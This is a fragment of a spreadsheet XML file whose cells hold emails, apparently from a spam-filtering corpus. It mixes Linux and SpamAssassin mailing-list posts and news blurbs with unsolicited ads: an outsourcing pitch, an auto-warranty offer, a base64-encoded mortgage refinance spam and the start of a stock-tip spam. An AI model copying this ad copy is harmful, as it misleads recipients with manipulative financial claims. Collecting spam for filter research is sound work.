 (1) Quibble:  For values of "work" limited to X11, not console support.
 (2) Decent substitute graphics cards with well-tested XFree86 support
 are cheap.  Swap the problematic one out, and save it for some other
 workstation later.  For that matter, somebody with a Win32 system
 containing such a card might be ecstatic over the opportunity to swap.
 (3) Welcome to the Linux world, where we've known for... oh... about
 eleven years that you fail to research chipsets before installation at
 your peril.
 -- 
 Cheers,   The difference between common sense and paranoia is that common sense
 Rick Moen     is thinking everyone is out to get you.  That's normal; they are.
 rick@linuxmafia.com      Paranoia is thinking they're conspiring.  -- J. Kegler
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Turpin:
 &gt;&gt;Do we have any statistics on the poor man's divorce from centuries past?
 Eugen Leitl:
 &gt;That's easy. Divorce didn't happen.
 You seem not to know what a "poor man's divorce" is.
 It is an old term, from the time when divorce was
 difficult, but walking was easy, and identity was
 not so locked down as it is today. Not every widow
 had a dead husband.
 &gt;I'm seeing lack of innovation ..
 That doesn't tell us anything except what is
 happening in Eugen Leitl's life. The more common
 observation is that the rate of change is increasing.
 Do you have any data that might persuade us that what
 you see is more telling than what others see?
 &gt;gerontocracy favors gerontocracy.
 I would have thought that gerontocracy favors biotech
 research and plenty of young workers to pay taxes.
 Note that the fertility rate doesn't result from
 decisions made by the old, but by the young. If we
 want more kids, we have to convince people who are
 in their twenties to become parents.
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail. 
 http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Proposal for cooperation
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello. I meant to contact http://taint.org webmaster,
 Am I correct, I hope?
 Actually, I am not quite sure... Did I or Natasha Fedorova write 
 you before to your other address? Anyway, now I am here instead of 
 her too.
 So, my name is Oksana Svetlova, I live in St. Petersburg, Russia.
 I have an idea, how we could cooperate to mutual benefit, see, 
 possibly you will find it interesting.
 People are seeking to cut costs with this economy slow-down, right?
 The thing is that I could get you in touch with developers from
 Russia, who will be happy to do a web designer's work for you for
 considerably less, than you possibly take from your clients (or 
 pay for web-design?), and with _professional_ quality. Also - all
 programming, Internet-programming, graphic, flash design, content
 writing, translations, etc. If you do web-design, then you may
 accept more orders at once, getting a good share from each, and
 devote yourself only to that work, you find most interesting.
 Alternatively, you can realize more your ideas to develop, more
 features to add to your existing sites, and with low costs: from
 $12, and an average of $18 an hour.
 I have put links to their works at www.antee.com/samples_and_faq.html
 As for reliability, I just saw, how carefully they hand-picked their
 specialists, and under what tight management they do their projects.
 So, from past experience, it was almost always possible to meet 
 deadlines. Also, communication is properly thought-out: a consultant 
 is online in ICQ and other instant messengers almost each day, also 
 their company has local consultants in many states throughout the 
 USA, in Europe and Australia.
 So, what do you think? A possibility for cooperation?
 Thank you very much,
 Oksana Svetlova.
 oksana@antee.com
 PS. Just in case you need any type of IT works now, please let me 
 know a bit of details, they will return you a cost/time estimation.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Viewing my trust rating?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Folks
 I know this question gets asked a lot, but I haven't seen an answer lately.
 Any idea when a user will be able to view his own trust rating?   What are
 the plans for this?  Will it be built into the client, web based, emailed
 to you nightly?  If you could share your brainstorming on the subject, I
 would greatly appreciate it.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</si>
  <si>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ADV: Extended Auto Warranty -- even older cars... czztb
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect yourself with an extended warranty for your car, minivan, truck or SUV. Rates can be as much as 60% cheaper than at the dealer!
 Extend your existing Warranty.
 Get a new Warranty even if your original Warranty expired.
 Get a FREE NO OBLIGATION Extended Warranty Quote NOW. Find out how much it would cost to Protect YOUR investment. 
 This is a FREE Service.
 Simply fill out our FREE NO OBLIGATION form and 
 find out.
 It's That Easy!
 Visit our website:  
  http://211.78.96.242/auto/warranty.htm
 ================================================
 To be removed, click below and fill out the remove form:
 http://211.78.96.242/removal/remove.htm
 Please allow 72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Re: SA In The News
</t>
  </si>
  <si>
    <t xml:space="preserve">So do you know my public key?  Does the guy who wants to buy 
 10,000 licenses of SpamAssassin Pro?  Do I really want to lose 
 email from either of you?
 C
 On Thursday, August 22, 2002, at 10:13  AM, Tony L. Svanstrom wrote:
 &gt; On Thu, 22 Aug 2002 the voices made Craig R.Hughes write:
 &gt;
 &gt;&gt; Trouble is, you don't necessarily know ahead of time who's 
 &gt;&gt; wanting to send
 &gt;&gt; you stuff.  I don't have your PGP public key on my keychain.  
 &gt;&gt; You can do all
 &gt;&gt; the signing you want, it's not going to help.  However, if you 
 &gt;&gt; stick a Habeas
 &gt;&gt; header in your mail, I can (hopefully) be reasonably sure that 
 &gt;&gt; you're not
 &gt;&gt; trying to spam me.  It is going to be all about enforcement 
 &gt;&gt; though; we'll
 &gt;&gt; have to see how they do on enforcement.
 &gt;
 &gt;  Signing messages to someone ('s public key) isn't impossible, 
 &gt; using some
 &gt; creative scripting you could even do it with OpenPGP-compatible 
 &gt; software...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</si>
  <si>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&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley &lt;harley@argote.ch&gt; writes:
     R&gt; Well IIRC, Cortez arrived in 1519, and DeSoto was born circa
     R&gt; 1500.  You do the math.
 Ah, I suppose so. If it wasn't DeSoto ... then who was it that landed
 in Southern Florida to be greeted by great cities of millions of
 mound-dwellers who had completely vanished by the time Cortez arrived
 to kill as many as he could?
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Duct-tapers -- suspension and bondage fetish goes mainstream
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85494705
 Date: Not supplied
 [IMG: http://www.craphound.com/images/tapedup.jpg] Duct-tapers are mainstream 
 bondage fetishists who tape each other up to walls and ceilings "just to see if 
 it will hold." Pervs. Link[1] Discuss[2] (_Thanks Steve[3]!_) 
 [1] http://www.octanecreative.com/ducttape/walltapings/index.html
 [2] http://www.quicktopic.com/boing/H/pG33EGvsJQ8
 [3] http://www.mindspring.com/~steve.portigal
</t>
  </si>
  <si>
    <t xml:space="preserve">Brian Foster wrote:
 &gt;  I use this fact on occasion to "save" data, via the well-
 &gt;  known attack of hard-linking to a supposedly-temporary file
 &gt;  I want to preserve.  the subsequent unlink(2)ing of the
 &gt;  "temporary" file does not destroy the data.
 Now here is a thought: a Unix version of the "Deleted Items" folder.
 In the root of a hard drive, create a directory ".unwanted". Then
 periodically create hard links to every file on the hard drive that does not
 have hard links.
 That way, when someone accidentally does "rm *" or whatever, you still have
 a link under ".unwanted"
 Another script can then periodically clear out enough old files to ensure
 that there is usually enough disk space.
 Although this sounds like a horrible hack. It would no doubt be much better
 to have a transaction oriented file system with a rollback facility.  :)
 - Matthew
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.comm
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lander risks missing Mars trip
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8052859,1440/
 Date: Not supplied
 British scientists vow to have their robotic probe ready for launch in 2003, 
 amid concerns over the project's finances
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: No Cost Out Of Pocket: REFI 5189ssQW0-729B-13
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00D6_44B11E8C.E6018B42
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxESVY+Jm5ic3A7PC9ESVY+PEZPTlQgc2l6ZT0yIFBUU0la
 RT0iMTAiPg0KICAgICAgPFRBQkxFIA0KICAgICAgc3R5bGU9IkJPUkRFUi1S
 SUdIVDogIzAwNjYwMCAxMnB4IGRvdWJsZTsgUEFERElORy1SSUdIVDogNHB4
 OyBCT1JERVItVE9QOiAjMDA2NjAwIDEycHggZG91YmxlOyBQQURESU5HLUxF
 RlQ6IDRweDsgUEFERElORy1CT1RUT006IDFweDsgQk9SREVSLUxFRlQ6ICMw
 MDY2MDAgMTJweCBkb3VibGU7IFBBRERJTkctVE9QOiAxcHg7IEJPUkRFUi1C
 T1RUT006ICMwMDY2MDAgMTJweCBkb3VibGU7IEJPUkRFUi1DT0xMQVBTRTog
 Y29sbGFwc2UiIA0KICAgICAgYm9yZGVyQ29sb3I9IzExMTExMSBoZWlnaHQ9
 MzM4IGNlbGxTcGFjaW5nPTAgYm9yZGVyQ29sb3JEYXJrPSNmZmZmZmYgDQog
 ICAgICBjZWxsUGFkZGluZz0wIHdpZHRoPTUzOSBib3JkZXJDb2xvckxpZ2h0
 PSNmZmZmZmYgYm9yZGVyPTA+DQogICAgICAgIDxUQk9EWT4NCiAgICAgICAg
 PFRSPg0KICAgICAgICAgIDxURCB3aWR0aD00IGhlaWdodD00MjM+Jm5ic3A7
 PC9URD4NCiAgICAgICAgICA8VEQgDQogICAgICAgICAgc3R5bGU9IkJPUkRF
 Ui1SSUdIVDogMHB4IHNvbGlkOyBCT1JERVItVE9QOiAwcHggc29saWQ7IEJP
 UkRFUi1MRUZUOiAwcHggc29saWQ7IEJPUkRFUi1CT1RUT006IDBweCBzb2xp
 ZCIgDQogICAgICAgICAgdkFsaWduPXRvcCBhbGlnbj1sZWZ0IHdpZHRoPTUz
 NSBoZWlnaHQ9NDIzPg0KICAgICAgICAgICAgPFRBQkxFIHN0eWxlPSJCT1JE
 RVItQ09MTEFQU0U6IGNvbGxhcHNlIiBib3JkZXJDb2xvcj0jMTExMTExIA0K
 ICAgICAgICAgICAgY2VsbFNwYWNpbmc9MCBjZWxsUGFkZGluZz00IHdpZHRo
 PSI5NSUiIGJnQ29sb3I9I2ZmZmZmZiBib3JkZXI9MD4NCiAgICAgICAgICAg
 ICAgPFRCT0RZPg0KICAgICAgICAgICAgICA8VFI+DQogICAgICAgICAgICAg
 ICAgPFREIHZBbGlnbj10b3AgYWxpZ249cmlnaHQgaGVpZ2h0PTQyND4NCiAg
 ICAgICAgICAgICAgICAgIDxUQUJMRSBjZWxsU3BhY2luZz0wIGNlbGxQYWRk
 aW5nPTAgd2lkdGg9IjEwMCUiIGJvcmRlcj0wPg0KICAgICAgICAgICAgICAg
 ICAgICANCiAgICAgICAgICAgICAgICAgICAgPFRSPg0KICAgICAgICAgICAg
 ICAgICAgICAgIDxURD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDxESVYg
 YWxpZ249bGVmdD48Rk9OVCANCiAgICAgICAgICAgICAgICAgICAgICAgIGZh
 Y2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIA0K
 ICAgICAgICAgICAgICAgICAgICAgICAgc2l6ZT0yPjxCPjxGT05UIA0KICAg
 ICAgICAgICAgICAgICAgICAgICAgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhl
 bHZldGljYSwgc2Fucy1zZXJpZiIgDQogICAgICAgICAgICAgICAgICAgICAg
 ICBjb2xvcj0jMDAwMDAwIHNpemU9Mj48QlI+PC9GT05UPjwvQj48L0ZPTlQ+
 PEZPTlQgDQogICAgICAgICAgICAgICAgICAgICAgICBjb2xvcj0jMDAwMDAw
 PjxCPjxGT05UIA0KICAgICAgICAgICAgICAgICAgICAgICAgZmFjZT0iVmVy
 ZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0yPkRl
 YXIgDQogICAgICAgICAgICAgICAgICAgICAgICBIb21lb3duZXIsPC9GT05U
 PjwvQj48L0ZPTlQ+PC9ESVY+DQogICAgICAgICAgICAgICAgICAgICAgICA8
 RElWIGFsaWduPWxlZnQ+Jm5ic3A7PC9ESVY+DQogICAgICAgICAgICAgICAg
 ICAgICAgICA8RElWIGFsaWduPWNlbnRlcj48Qj48Rk9OVCANCiAgICAgICAg
 ICAgICAgICAgICAgICAgIGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRp
 Y2EsIHNhbnMtc2VyaWYiPio8L0ZPTlQ+PEZPTlQgDQogICAgICAgICAgICAg
 ICAgICAgICAgICBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBz
 YW5zLXNlcmlmIiANCiAgICAgICAgICAgICAgICAgICAgICAgIGNvbG9yPSNm
 ZjAwMDA+Ni4yNSUgMzAgWXIgRml4ZWQgUmF0ZSANCiAgICAgICAgICAgICAg
 ICAgICAgICAgIE1vcnRnYWdlPC9GT05UPjwvQj48L0RJVj48L1REPjwvVFI+
 DQogICAgICAgICAgICAgICAgICAgIDxUUj4NCiAgICAgICAgICAgICAgICAg
 ICAgICA8VEQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8RElWIGFsaWdu
 PWxlZnQ+PEZPTlQgDQogICAgICAgICAgICAgICAgICAgICAgICBmYWNlPVZl
 cmRhbmEsQXJpYWwsSGVsdmV0aWNhLHNhbnMtc2VyaWYgc2l6ZT0yPkludGVy
 ZXN0IA0KICAgICAgICAgICAgICAgICAgICAgICAgcmF0ZXMgYXJlIGF0IHRo
 ZWlyIGxvd2VzdCBwb2ludCBpbiA0MCB5ZWFycyEgV2UgaGVscCB5b3UgDQog
 ICAgICAgICAgICAgICAgICAgICAgICBmaW5kIHRoZSBiZXN0IHJhdGUgZm9y
 IHlvdXIgc2l0dWF0aW9uIGJ5IG1hdGNoaW5nIHlvdXIgDQogICAgICAgICAg
 ICAgICAgICAgICAgICBuZWVkcyB3aXRoIGh1bmRyZWRzIG9mIGxlbmRlcnMh
 IDxCPkhvbWUgSW1wcm92ZW1lbnQ8L0I+LCANCiAgICAgICAgICAgICAgICAg
 ICAgICAgIDxCPlJlZmluYW5jZTwvQj4sIDxCPlNlY29uZCBNb3J0Z2FnZTwv
 Qj4sIDxCPkhvbWUgRXF1aXR5IA0KICAgICAgICAgICAgICAgICAgICAgICAg
 TG9hbnMsIGFuZCBNb3JlISA8L0I+RXZlbiB3aXRoIGxlc3MgdGhhbiBwZXJm
 ZWN0IGNyZWRpdCEgDQogICAgICAgICAgICAgICAgICAgICAgICA8L0ZPTlQ+
 PC9ESVY+PC9URD48L1RSPjwvVEFCTEU+DQogICAgICAgICAgICAgICAgICA8
 VEFCTEUgc3R5bGU9IlBPU0lUSU9OOiByZWxhdGl2ZTsgQk9SREVSLUNPTExB
 UFNFOiBjb2xsYXBzZSIgDQogICAgICAgICAgICAgICAgICBib3JkZXJDb2xv
 cj0jMTExMTExIGhlaWdodD0xIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9
 MCANCiAgICAgICAgICAgICAgICAgIHdpZHRoPTUwNCBib3JkZXI9MD4NCiAg
 ICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgIDxUUj4N
 CiAgICAgICAgICAgICAgICAgICAgICA8VEQgdkFsaWduPXRvcCB3aWR0aD0z
 MjUgaGVpZ2h0PTE+DQogICAgICAgICAgICAgICAgICAgICAgICA8RElWIGFs
 aWduPWNlbnRlcj48Rk9OVCANCiAgICAgICAgICAgICAgICAgICAgICAgIGZh
 Y2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIA0K
 ICAgICAgICAgICAgICAgICAgICAgICAgc2l6ZT0yPjxCPjxCUj48L0E+PEEg
 DQogICAgICAgICAgICAgICAgICAgICAgICBocmVmPSJodHRwOi8vNjQuMjUx
 LjIyLjEwMS9pbnRlcmVzdC9pbmRleDUyNTQ0Lmh0bSI+Q2xpY2sgSGVyZSBm
 b3IgYSBGcmVlIA0KICAgICAgICAgICAgICAgICAgICAgICAgUXVvdGUhPC9B
 PjwvQj48L0ZPTlQ+PEEgDQogICAgICAgICAgICAgICAgICAgICAgIA0KICAg
 ICAgICAgICAgICAgICAgICAgICAgaHJlZj0iaHR0cDovLzY0LjI1MS4yMi4x
 MDEvaW50ZXJlc3QvaW5kZXguaHRtIj4gPC9BPjwvRElWPg0KICAgICAgICAg
 ICAgICAgICAgICAgICAgPFA+PEI+PEZPTlQgZmFjZT1WZXJkYW5hLEFyaWFs
 LEhlbHZldGljYSxzYW5zLXNlcmlmIA0KICAgICAgICAgICAgICAgICAgICAg
 ICAgc2l6ZT0yPkxvY2sgSW4gWU9VUiBMT1cgRklYRUQgUkFURSBUT0RBWTwv
 Rk9OVD48L0I+PC9QPg0KICAgICAgICAgICAgICAgICAgICAgICAgPERMPg0K
 ICAgICAgICAgICAgICAgICAgICAgICAgICA8REQ+PEI+PEZPTlQgZmFjZT1X
 ZWJkaW5ncyBjb2xvcj0jZmYwMDAwIHNpemU9NSANCiAgICAgICAgICAgICAg
 ICAgICAgICAgICAgUFRTSVpFPSIxMCI+YTwvRk9OVD48Rk9OVCANCiAgICAg
 ICAgICAgICAgICAgICAgICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhlbHZl
 dGljYSxzYW5zLXNlcmlmIHNpemU9Mj5OTyBDT1NUIA0KICAgICAgICAgICAg
 ICAgICAgICAgICAgICBPVVQgT0YgUE9DS0VUPC9GT05UPjwvQj4gDQogICAg
 ICAgICAgICAgICAgICAgICAgICAgIDxERD48Qj48Rk9OVCBmYWNlPVdlYmRp
 bmdzIGNvbG9yPSNmZjAwMDAgc2l6ZT01IA0KICAgICAgICAgICAgICAgICAg
 ICAgICAgICBQVFNJWkU9IjEwIj5hPC9GT05UPjwvQj48Rk9OVCANCiAgICAg
 ICAgICAgICAgICAgICAgICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhlbHZl
 dGljYSxzYW5zLXNlcmlmIHNpemU9Mj48Qj5OTyANCiAgICAgICAgICAgICAg
 ICAgICAgICAgICAgT0JMSUdBVElPTjwvQj48L0ZPTlQ+IA0KICAgICAgICAg
 ICAgICAgICAgICAgICAgICA8REQ+PEI+PEZPTlQgZmFjZT1XZWJkaW5ncyBj
 b2xvcj0jZmYwMDAwIHNpemU9NSANCiAgICAgICAgICAgICAgICAgICAgICAg
 ICAgUFRTSVpFPSIxMCI+YTwvRk9OVD48L0I+PEZPTlQgDQogICAgICAgICAg
 ICAgICAgICAgICAgICAgIGZhY2U9VmVyZGFuYSxBcmlhbCxIZWx2ZXRpY2Es
 c2Fucy1zZXJpZiBzaXplPTI+PEI+RlJFRSANCiAgICAgICAgICAgICAgICAg
 ICAgICAgICAgQ09OU1VMVEFUSU9OPC9CPjwvRk9OVD4gDQogICAgICAgICAg
 ICAgICAgICAgICAgICAgIDxERD48Qj48Rk9OVCBmYWNlPVdlYmRpbmdzIGNv
 bG9yPSNmZjAwMDAgc2l6ZT01IA0KICAgICAgICAgICAgICAgICAgICAgICAg
 ICBQVFNJWkU9IjEwIj5hPC9GT05UPjwvQj48Rk9OVCANCiAgICAgICAgICAg
 ICAgICAgICAgICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhlbHZldGljYSxz
 YW5zLXNlcmlmIHNpemU9Mj48Qj5BTEwgDQogICAgICAgICAgICAgICAgICAg
 ICAgICAgIENSRURJVCBHUkFERVMgQUNDRVBURUQ8L0I+PC9GT05UPiA8L0RE
 PjwvREw+DQogICAgICAgICAgICAgICAgICAgICAgICA8RElWIGFsaWduPWNl
 bnRlcj48Rk9OVCANCiAgICAgICAgICAgICAgICAgICAgICAgIGZhY2U9VmVy
 ZGFuYSxBcmlhbCxIZWx2ZXRpY2Esc2Fucy1zZXJpZiBjb2xvcj1yZWQgDQog
 ICAgICAgICAgICAgICAgICAgICAgICBzaXplPTI+PEI+PEEgDQogICAgICAg
 ICAgICAgICAgICAgICAgICBocmVmPSJodHRwOi8vNjQuMjUxLjIyLjEwMS9p
 bnRlcmVzdC9pbmRleDUyNTQ0Lmh0bSI+UmF0ZXMgYXMgDQogICAgICAgICAg
 ICAgICAgICAgICAgICBsb3cgYXMgNi4yNSUgd29uJ3Qgc3RheSB0aGlzIGxv
 dyBmb3JldmVyIENMSUNLIA0KICAgICAgICAgICAgICAgICAgICAgICAgSEVS
 RTwvQT48L0I+PC9GT05UPjwvRElWPg0KICAgICAgICAgICAgICAgICAgICAg
 ICAgPERJViBhbGlnbj1jZW50ZXI+Jm5ic3A7PC9ESVY+DQogICAgICAgICAg
 ICAgICAgICAgICAgICA8RElWIGFsaWduPWNlbnRlcj48Rk9OVCBzaXplPTIg
 UFRTSVpFPSIxMCI+PEI+PEZPTlQgDQogICAgICAgICAgICAgICAgICAgICAg
 ICBzdHlsZT0iRk9OVC1TSVpFOiA2cHQiIA0KICAgICAgICAgICAgICAgICAg
 ICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhlbHZldGljYSxzYW5zLXNlcmlm
 PiogYmFzZWQgb24gDQogICAgICAgICAgICAgICAgICAgICAgICBtb3J0Z2Fn
 ZSByYXRlIGFzIG9mIDUtMTUtMDIgYXMgbG93IGFzIDYuMjUlIHNlZSBsZW5k
 ZXIgDQogICAgICAgICAgICAgICAgICAgICAgICBmb3IgZGV0YWlsczwvRk9O
 VD48L0I+PC9GT05UPjwvRElWPjwvVEQ+DQogICAgICAgICAgICAgICAgICAg
 ICAgPFREIHZBbGlnbj10b3Agd2lkdGg9NCBoZWlnaHQ9MT4NCiAgICAgICAg
 ICAgICAgICAgICAgICAgIDxESVYgYWxpZ249cmlnaHQ+Jm5ic3A7PC9ESVY+
 PC9URD4NCiAgICAgICAgICAgICAgICAgICAgICA8VEQgYm9yZGVyQ29sb3I9
 IzAwNjYwMCB3aWR0aD0xNzUgYmdDb2xvcj0jZmZmZmZmIA0KaGVpZ2h0PTE+
 DQogICAgICAgICAgICAgICAgICAgICAgICA8SDE+PFNQQU4gc3R5bGU9IlZF
 UlRJQ0FMLUFMSUdOOiBtaWRkbGUiPjxGT05UIA0KICAgICAgICAgICAgICAg
 ICAgICAgICAgc3R5bGU9IkZPTlQtU0laRTogMjAwcHgiIGZhY2U9V2ViZGlu
 Z3MgY29sb3I9IzAwNjYwMD48QSANCiAgICAgICAgICAgICAgICAgICAgICAg
 IGhyZWY9Imh0dHA6Ly82NC4yNTEuMjIuMTAxL2ludGVyZXN0L2luZGV4NTI1
 NDQuaHRtIj48Rk9OVCANCiAgICAgICAgICAgICAgICAgICAgICAgIGNvbG9y
 PSMwMDY2MDA+SDwvRk9OVD48L0E+PC9GT05UPjwvU1BBTj48L0gxPjwvVEQ+
 PC9UUj48L1RBQkxFPg0KICAgICAgICAgICAgICAgICAgPFRBQkxFIGNlbGxT
 cGFjaW5nPTAgY2VsbFBhZGRpbmc9MyB3aWR0aD00NzIgYm9yZGVyPTA+DQog
 ICAgICAgICAgICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAgICAgICAg
 ICAgPFRSPg0KICAgICAgICAgICAgICAgICAgICAgIDxURCBjb2xTcGFuPTIg
 aGVpZ2h0PTY0PjxGT05UIA0KICAgICAgICAgICAgICAgICAgICAgICAgZmFj
 ZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6
 ZT0yPjxCPg0KICAgICAgICAgICAgICAgICAgICAgICAgPFRBQkxFIGhlaWdo
 dD0zOCBjZWxsU3BhY2luZz0yIGNlbGxQYWRkaW5nPTAgd2lkdGg9NDgyIA0K
 ICAgICAgICAgICAgICAgICAgICAgICAgYm9yZGVyPTA+DQogICAgICAgICAg
 ICAgICAgICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAgICAgICAgICAg
 ICAgICAgPFRSPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxURCAN
 CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBzdHlsZT0iQk9SREVSLVJJ
 R0hUOiAwcHggc29saWQ7IEJPUkRFUi1UT1A6IDBweCBzb2xpZDsgQk9SREVS
 LUxFRlQ6IDBweCBzb2xpZDsgQk9SREVSLUJPVFRPTTogMHB4IHNvbGlkIiAN
 CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aWR0aD0zMjcgaGVpZ2h0
 PTM2PjxGT05UIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmFj
 ZT1WZXJkYW5hLEFyaWFsLEhlbHZldGljYSxzYW5zLXNlcmlmIA0KICAgICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgc2l6ZT0yPkFwcGx5IG5vdyBhbmQg
 b25lIG9mIG91ciBsZW5kaW5nIHBhcnRuZXJzIA0KICAgICAgICAgICAgICAg
 ICAgICAgICAgICAgICAgd2lsbCBnZXQgYmFjayB0byB5b3Ugd2l0aGluIDQ4
 IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG91cnMuPC9GT05U
 PjwvRk9OVD48Rk9OVCBzdHlsZT0iRk9OVC1TSVpFOiA2cHQiIA0KICAgICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhl
 bHZldGljYSxzYW5zLXNlcmlmPjwvRk9OVD48L1REPjwvRk9OVD48Rk9OVCAN
 CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBmYWNlPSJWZXJkYW5hLCBB
 cmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPTI+DQogICAgICAg
 ICAgICAgICAgICAgICAgICAgICAgPFREIHN0eWxlPSJCT1JERVItTEVGVDog
 MXB4IHNvbGlkIiB3aWR0aD0xNDEgDQogICAgICAgICAgICAgICAgICAgICAg
 ICAgICAgYmdDb2xvcj0jZmYwMDAwIGhlaWdodD0zNj4NCiAgICAgICAgICAg
 ICAgICAgICAgICAgICAgICAgIDxQIGFsaWduPWNlbnRlcj48Qj48Rk9OVCBj
 b2xvcj0jZmZmZmZmIHNpemU9ND48QSANCiAgICAgICAgICAgICAgICAgICAg
 ICAgICAgICAgIHN0eWxlPSJURVhULURFQ09SQVRJT046IG5vbmUiIA0KICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgaHJlZj0iaHR0cDovLzY0LjI1
 MS4yMi4xMDEvaW50ZXJlc3QvaW5kZXg1MjU0NC5odG0iPjxGT05UIA0KICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgY29sb3I9I2ZmZmZmZj5DTElD
 SyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBIRVJFITwvRk9OVD48
 L0E+PC9GT05UPjwvQj48L1A+PC9URD4NCiAgICAgICAgICAgICAgPC9UUj4N
 CiAgICAgICAgICAgIDwvVEFCTEU+PC9GT05UPjwvQj48L1REPjwvVFI+PC9U
 Qk9EWT48L1RBQkxFPjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9URD48
 L1RSPjwvVEJPRFk+PC9UQUJMRT4NCiAgICAgIDxQPmNvbXBsZXRlIG5hbWUg
 cmVtb3Zpbmcgc3lzdGVtIGF0IHdlYnNpdGUuDQo8cD4NCjwvaHRtbD4NCg0K
 NTQ5NWdvU1g5LTgzMXJHanI0MDkxWW1yRzItOTU2bnF4TjE5MTFCUHFSNi04
 MTNGcXlYNDgxM1FBQU8xLTYxNlZHcGUyNzZsNjc=
 ------=_NextPart_000_00D6_44B11E8C.E6018B42--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</si>
  <si>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
 Related anecdote:
 I was eating in a restaurant in chinatown in Boston.  The place was empty.  
 The only other customer was a white guy reading an asian-language 
 newspaper.  The guy asked the waiter for help translating a word.  
 Eventually his story came out.
 He had married an asian woman through one of these introduction services.  
 after about a year of marriage she had charged him with assault and left
 him, leaving no contact information.  He was hanging around in Chinatown,
 asking random asians for help finding her.
 I obviously don't know if he did assault her, but what struck me was that
 the possibility of mutual exploitation is high.
 Anecdote number two:
 In college I had a job as a street vendor.  There was a guy I worked with
 who was a lifer in the job.  He was a noticably messed up guy.  Among
 other odd characteristics he fawned on women customers, doing stuff like
 offering them flowers.
 I asked him about it.  He said that he'd never had sex with a woman who
 wasn't a prostitute, and his dream was to save up enough money to get a
 mail order bride.
 I was really moved.  The guy was a loon, but he wanted a companion as much
 as anyone else and he was realistic about his chances.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 8 Aug 2002, Paul Jakma wrote:
 &gt; unfortunately, often spammers provide real return addresses - just not 
 &gt; their own.
 &gt; 
 &gt; so if everyone used tmda, these poor unfortunates would receive
 &gt; millions of tmda confirm messages, in addition to the hundred thousand
 &gt; 'undeliverable' messages that they already get..
 	http://messagewall.org/
 same concept as tmda (smtp "proxy") but not as extreme as tmda.net - 
 dnsbl, distributed checksum and various other checks.
 regards,
 -- 
 Paul Jakma	Sys Admin	Alphyra
 	paulj@alphyra.ie
 Warning: /never/ send email to spam@dishone.st or trap@dishone.st
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Is the stock market roller coaster making you worried
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#000000" text="#FFFF00"&gt;
 &lt;p align="center"&gt;&lt;font size="4"&gt;&lt;b&gt;FINANCIAL INVESTMENT CENTER&lt;br&gt;
 INSIDER NEWS&amp;nbsp;&lt;br&gt;
